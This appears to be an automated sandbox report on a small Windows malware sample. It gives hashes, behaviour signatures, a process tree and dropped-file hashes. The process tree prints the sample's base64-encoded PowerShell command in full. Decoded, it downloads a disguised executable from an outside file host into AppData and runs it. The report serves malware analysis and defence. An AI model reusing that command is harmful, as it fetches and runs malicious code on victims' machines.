Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
108s -
max time network
147s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
17/12/2022, 07:24
Static task
static1
Behavioral task
behavioral1
Sample
4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6.exe
Resource
win10-20220812-en
General
-
Target
4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6.exe
-
Size
6KB
-
MD5
e00a8ecde46559e1dcb068be14012c8a
-
SHA1
59986cb0d2d4705c0855c7aa86d558d5bd5a461c
-
SHA256
4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6
-
SHA512
387ea81bd4027a05c64a85d1a1fbe4552989fa1eca14d29ed8206cd351cedcf03f3da90c65d5e9c449d4db96c39844344d222ea7f764059fc43e2061c5796fde
-
SSDEEP
96:q79ULL1bhycG8WmaiO8YtNnxJ5A6tMNtUqkkbz5FQgL/d3ojBrl:s9ULL1bhyc48INnxJ5BaNtUqkkbz7D/a
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 5012 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4584 asd11111132113.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4284 4584 WerFault.exe 68 -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5012 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4328 wrote to memory of 5012 4328 4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6.exe 66 PID 4328 wrote to memory of 5012 4328 4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6.exe 66 PID 5012 wrote to memory of 4584 5012 powershell.exe 68 PID 5012 wrote to memory of 4584 5012 powershell.exe 68 PID 5012 wrote to memory of 4584 5012 powershell.exe 68
Processes
-
C:\Users\Admin\AppData\Local\Temp\4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6.exe"C:\Users\Admin\AppData\Local\Temp\4200b1d7f10ecde80a7ac28c5090bd380a87100bc0d1f367893de2e2a490a9d6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAegB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADIAMQA1ADMAOQA1ADEAMAA2ADUAMgAyADcAMgA2ADQALwAxADAANQAyADEANQA0ADYANgAxADkAMgA0ADIANAA1ADUANQA0AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAdwB6AGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGcAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHIAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZAAxADEAMQAxADEAMQAzADIAMQAxADMALgBlAHgAZQAnACkAKQA8ACMAZgBrAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBrAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdQB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkADEAMQAxADEAMQAxADMAMgAxADEAMwAuAGUAeABlACcAKQA8ACMAbgByAHEAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Users\Admin\AppData\Roaming\asd11111132113.exe"C:\Users\Admin\AppData\Roaming\asd11111132113.exe"3⤵
- Executes dropped EXE
PID:4584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 7644⤵
- Program crash
PID:4284
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1006KB
MD5f87fd290c2d08ede25d6a8def9657c07
SHA1930e7f35e0d5a43faf19ad75bc41c7efce914a17
SHA256a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf
SHA5120093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07
-
Filesize
1006KB
MD5f87fd290c2d08ede25d6a8def9657c07
SHA1930e7f35e0d5a43faf19ad75bc41c7efce914a17
SHA256a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf
SHA5120093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07